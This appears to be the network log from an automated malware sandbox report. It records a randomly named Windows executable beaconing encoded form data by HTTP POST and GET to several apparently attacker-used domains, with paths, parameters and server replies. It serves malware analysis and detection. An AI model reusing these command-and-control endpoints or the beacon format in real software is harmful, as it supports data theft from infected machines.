                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    x-redirect-by: WordPress
                                                    location: http://superunicornpalace.com/mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs=
                                                    content-length: 0
                                                    date: Wed, 03 Jul 2024 15:53:04 GMT
                                                    server: LiteSpeed


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.6 | 49763 | 162.43.101.114 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:09.675602913 CEST | 598 | OUT | POST /rxdf/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.tedjp-x.com
                                                    Origin: http://www.tedjp-x.com
                                                    Referer: http://www.tedjp-x.com/rxdf/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:10.503029108 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 03 Jul 2024 15:54:50 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                    ETag: W/"afe-6098b1f8c138d"
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.6 | 49764 | 162.43.101.114 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:12.215511084 CEST | 622 | OUT | POST /rxdf/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.tedjp-x.com
                                                    Origin: http://www.tedjp-x.com
                                                    Referer: http://www.tedjp-x.com/rxdf/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:13.069911003 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 03 Jul 2024 15:54:53 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                    ETag: W/"afe-6098b1f8c138d"
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.6 | 49765 | 162.43.101.114 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:14.762197971 CEST | 1635 | OUT | POST /rxdf/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.tedjp-x.com
                                                    Origin: http://www.tedjp-x.com
                                                    Referer: http://www.tedjp-x.com/rxdf/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:15.598923922 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 03 Jul 2024 15:54:55 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                    ETag: W/"afe-6098b1f8c138d"
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    36 | 192.168.2.6 | 49766 | 162.43.101.114 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:17.331583977 CEST | 343 | OUT | GET /rxdf/?7Dihs8p=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.tedjp-x.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:18.155076981 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 03 Jul 2024 15:54:58 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 2814
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                    ETag: "afe-6098b1f8c138d"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    37 | 192.168.2.6 | 49767 | 45.113.122.18 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:23.552231073 CEST | 616 | OUT | POST /n8zi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.3cubesinterior.in
                                                    Origin: http://www.3cubesinterior.in
                                                    Referer: http://www.3cubesinterior.in/n8zi/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    38 | 192.168.2.6 | 49768 | 45.113.122.18 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:26.082559109 CEST | 640 | OUT | POST /n8zi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.3cubesinterior.in
                                                    Origin: http://www.3cubesinterior.in
                                                    Referer: http://www.3cubesinterior.in/n8zi/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:27.542579889 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:26 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://3cubesinterior.in/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    39 | 192.168.2.6 | 49769 | 45.113.122.18 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:28.614392996 CEST | 1653 | OUT | POST /n8zi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.3cubesinterior.in
                                                    Origin: http://www.3cubesinterior.in
                                                    Referer: http://www.3cubesinterior.in/n8zi/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:30.143215895 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:29 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://3cubesinterior.in/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    40 | 192.168.2.6 | 49770 | 45.113.122.18 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:31.148272038 CEST | 349 | OUT | GET /n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.3cubesinterior.in
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:32.511399031 CEST | 513 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Wed, 03 Jul 2024 15:53:32 GMT
                                                    Server: nginx/1.23.4
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 0
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Location: http://3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=
                                                    X-Server-Cache: true
                                                    X-Proxy-Cache: MISS


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    41 | 192.168.2.6 | 49772 | 172.217.18.19 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:43.464940071 CEST | 625 | OUT | POST /s0j2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.artvectorcraft.store
                                                    Origin: http://www.artvectorcraft.store
                                                    Referer: http://www.artvectorcraft.store/s0j2/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:44.098350048 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Server: ghs
                                                    Content-Length: 1566
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    42 | 192.168.2.6 | 49773 | 172.217.18.19 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:46.005815029 CEST | 649 | OUT | POST /s0j2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.artvectorcraft.store
                                                    Origin: http://www.artvectorcraft.store
                                                    Referer: http://www.artvectorcraft.store/s0j2/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:46.653047085 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Server: ghs
                                                    Content-Length: 1566
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    43 | 192.168.2.6 | 49774 | 172.217.18.19 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:48.538191080 CEST | 1662 | OUT | POST /s0j2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.artvectorcraft.store
                                                    Origin: http://www.artvectorcraft.store
                                                    Referer: http://www.artvectorcraft.store/s0j2/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p= [TRUNCATED]
                                                    Jul 3, 2024 17:53:49.176048994 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Server: ghs
                                                    Content-Length: 1566
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                    Jul 3, 2024 17:53:49.176536083 CEST | 537 | IN
                                                    Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    44 | 192.168.2.6 | 49775 | 172.217.18.19 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:51.072808027 CEST | 352 | OUT | GET /s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.artvectorcraft.store
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:51.731034040 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Server: ghs
                                                    Content-Length: 1727
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                    Jul 3, 2024 17:53:51.731097937 CEST | 698 | IN
                                                    Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    45 | 192.168.2.6 | 49776 | 64.190.62.22 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:54:05.594270945 CEST | 622 | OUT | POST /pv57/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hondamechanic.today
                                                    Origin: http://www.hondamechanic.today
                                                    Referer: http://www.hondamechanic.today/pv57/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=3W0pN7WNy+URlaRbXcX9aGU9oUe+LaKC//LJ3ZiAU/HUPNkXEa6ch6mxebhLci1uKWIWvsFulPRcE5pEDBeG5hJH3bHVrikepxrKwTPtQTSZDhjMvppNlwgSe8Gi7bwdq/QIBPj64GtrtTIP9v4nxaer0ms5Z932ooBC0Z/kCwOoBiF9tOPUa5wGolPH9XImdv24NqFnNHPy
                                                    Jul 3, 2024 17:54:06.244419098 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:54:06 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    46 | 192.168.2.6 | 49777 | 64.190.62.22 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:54:08.153166056 CEST | 646 | OUT | POST /pv57/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hondamechanic.today
                                                    Origin: http://www.hondamechanic.today
                                                    Referer: http://www.hondamechanic.today/pv57/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=3W0pN7WNy+URj6BbV779OWUirUe+C6KO//PJ3d6QVLrUPtUXWOWctamxW7h0WC11KWNpvtpulPFcE8NEC2qJ2RJF87HXlCkepxrKwXvXQT6ZDRTMvIpMsQgdf8GixLxUq/QqBLif4EFrtSUP96MkoKfgwmtyKsSciIc99Y7oXyeJN0Enx9P3IpQEonX193IMfvO4f9JACzqRbr+8Rse2mbD4Kyotxj48cQ==
                                                    Jul 3, 2024 17:54:08.772382975 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:54:08 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    47 | 192.168.2.6 | 49778 | 64.190.62.22 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:54:10.698177099 CEST | 1659 | OUT | POST /pv57/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hondamechanic.today
                                                    Origin: http://www.hondamechanic.today
                                                    Referer: http://www.hondamechanic.today/pv57/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=3W0pN7WNy+URj6BbV779OWUirUe+C6KO//PJ3d6QVK/UP80XE5CcuamxcbhxWC10KW1tvt0ZlN9cEaBEFDGJhhJFzbHWrikLpwbOwTLXQT6ZDTbMoZpMqQgSe8Gm7bx8q/IQBLnq41lrs20PwoUkgKfi3mthKsuHiIBG9YOFXy6JJCF815OsLpI3pUvW4X94GPKdeOx2d3bySu+zQMHCh6/PFFt1wBk0JdL1IHvhVpK4KBm1CeJrwbT4uWNbmGKBY5kYGmrV73pKZj6IDus3UvX98MFEQGANmewyh9Hp/DFOEX/JaTa+D3j9z52Y/4XhWrQw1njmK5X8gIaSI7FihWn4amRYyOeLQsLmCeeLgWj7GBuFgeAr4CQ+OE3BW4yO892REAalMg7An16aEFSkpbmxv7w3qntgYhoqR7oZihZqZYI2JX6FI7WptdOhZTP3ai065d7EVZprK6zlFhCVtwZf5XZ/N+z/poOH6ajeAFfo94NTWWtW5JgX4QdGoMBrJd/SFcOst3K1OvvzPBCVRCPtroSs99UevoHhOZa2A16wAH9UXJnTyWREmo4NCA5UcHnXuWEPVyV4h6AUFEmyIXJZ6SI16ddtuts4/6Q/SBBjoRFY0NVq1dleKfKTtM9TfYyUSMdahW9gDTNFL5+vH+6CJ/AEoa7Mk6UCME53uW31zsCbCrNjGN9NT5D7V+bs1vKei8jb5UyIcDidiravcmsULyVofpKrWLGuCEFyMwg9s7H9FK5Yz9zx4D+CEumFGaLhOY6jpHsWHwBjucinwGGDN1OS4KYKZcH0nu5zMaDzY2+nKiEFN+AxxHClLT3G7daXcdikp0RDpLRWmY24dJAup3RUcAfUyMcBUcGVjWtd5hYMET3wlvCAM/w4MSAwTdhDqDOO2RwjYtotH67QYO8w9LEFIFp61T0aioOw1eriOnAJGqTICnrTa84Ax4tUNZixZo2xeYfhXodQcZvefSEym0UBNawKRBzN9EmaYAkp [TRUNCATED]
                                                    Jul 3, 2024 17:54:11.343502998 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:54:11 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    48 | 192.168.2.6 | 49779 | 64.190.62.22 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:54:14.460971117 CEST | 351 | OUT | GET /pv57/?7Dihs8p=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.hondamechanic.today
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:54:15.122764111 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Wed, 03 Jul 2024 15:54:15 GMT
                                                    content-type: text/html; charset=UTF-8
                                                    transfer-encoding: chunked
                                                    vary: Accept-Encoding
                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    pragma: no-cache
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_1X9tEZKJRzgehQdSsJ49RXYKM8b4TLpXhlnFJwOt87Fy/HNI0KLeWIMD1xr6flNJzJzV1X9WkaRc4cxp7p/ZwA==
                                                    last-modified: Wed, 03 Jul 2024 15:54:15 GMT
                                                    x-cache-miss-from: parking-64f5d45c5c-fphbs
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_1X9tEZKJRzgehQdSsJ49RXYKM8b4TLpXhlnFJwOt87Fy/HNI0KLeWIMD1xr6flNJzJzV1X9WkaRc4cxp7p/ZwA==><head><meta charset="utf-8"><title>hondamechanic.today&nbsp;-&nbsp;hondamechanic Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="hondamechanic.today is your first and best source for all of the



                                                    Target ID:0
                                                    Start time:11:50:06
